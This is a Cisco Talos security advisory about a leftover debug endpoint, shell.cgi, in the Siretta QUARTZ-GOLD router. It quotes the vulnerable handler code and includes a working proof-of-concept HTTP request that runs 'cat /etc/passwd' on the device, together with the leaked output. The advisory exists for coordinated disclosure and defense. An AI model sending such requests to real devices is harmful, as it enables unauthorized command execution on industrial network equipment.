A leftover debug code vulnerability exists in the httpd shell.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to remote code execution. An attacker can send an HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Siretta QUARTZ-GOLD G5.0.1.5-210720-141020

**PRODUCT URLS**

QUARTZ-GOLD - https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/

**CVSSv3 SCORE**

7.2 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-489 - Leftover Debug Code

**DETAILS**

The Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others.

Based on the web page shown, functionalities and the documentation publicly available, the QUARTZ-GOLD does not provide any way to directly access the linux system that runs on the router. The router’s web server is based on AdvancedTomato, which offers several debug APIs active by default. The developer, allegedly, forgot to disable those debug APIs. For instance, the AdvancedTomato’s shell.cgi API is still active, allowing arbitrary command execution:

    static void wo_shell(char *url)
    {
        web_puts("\ncmdresult = '");
        _execute_command(NULL, webcgi_get("command"), NULL, WOF_JAVASCRIPT);
        web_puts("';");
    }
    

wo_shell is the function that is called when the shell.cgi API is requested. This function will call the _execute_command with the request’s command parameter. This function will effectively execute the provided shell command. The leftover debug code allows arbitrary command execution.

**Exploit Proof of Concept**

Sending a request like the following:

    POST /shell.cgi HTTP/1.1
    Authorization: Basic <a valid basic auth>
    Content-Length: 52
    
    command=cat /etc/passwd&_http_id=<the correct tid>
    

Will generate the following response:

    HTTP/1.0 200 OK
    Date: Sat, 01 Jan 2000 22:01:30 GMT
    Content-Type: text/javascript
    Cache-Control: no-cache, no-store, must-revalidate, private
    Expires: Thu, 31 Dec 1970 00:00:00 GMT
    Pragma: no-cache
    Connection: close
    
    
    cmdresult = 'root:x:0:0:root:/root:/bin/sh\x0aadmin:x:0:0:admin:/root:/bin/sh\x0anobody:x:65534:65534:nobody:/dev/null:/dev/null\x0a';
    

The request will make the router execute the command cat /etc/passwd and respond to the HTTP request with the output of the command back.

**TIMELINE**

2022-10-14 - Initial Vendor Contact

2022-10-20 - Vendor Disclosure

2022-11-24 - Vendor Patch Release

2023-01-26 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

Tag

#rce